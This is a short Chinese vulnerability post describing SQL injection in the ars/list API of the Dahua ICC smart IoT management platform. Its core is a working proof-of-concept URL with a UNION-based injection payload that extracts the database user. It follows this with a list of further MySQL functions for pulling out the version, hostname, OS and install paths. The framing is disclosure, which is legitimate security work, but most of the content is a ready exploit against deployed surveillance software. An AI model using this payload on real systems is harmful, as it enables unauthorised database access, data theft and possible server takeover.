大华智能物联管理平台evo-apigw/evo-arsm/1.0.0/ars/list接口存在SQL注入漏洞
智能物联综合管理平台(平台版本:V5.000.0000016.0.R)
一、漏洞描述
大华ICC智能物联综合管理平台大华ICC智能物联综合管理平台 ars/list 接口存在SQL注入漏洞。恶意攻击者通过注入恶意SQL指令,可非法访问、篡改或删除数据库敏感数据,甚至通过数据库提权功能获取服务器最高控制权,导致严重的数据泄露或业务中断。

二、验证POC
/evo-apigw/evo-arsm/1.0.0/ars/list?serviceName=%27+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(0x7e,user(),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-
- 其他可用函数:
- VERSION() 数据库版本
- USER() 当前用户(含主机)
- CURRENT_USER() 当前用户
- DATABASE() 当前数据库名
- @@hostname 服务器主机名
- @@version_compile_os 操作系统
- @@datadir 数据目录
- @@basedir 安装目录
- @@version_compile_machine 系统架构
三、验证截图


浙公网安备 33010602011771号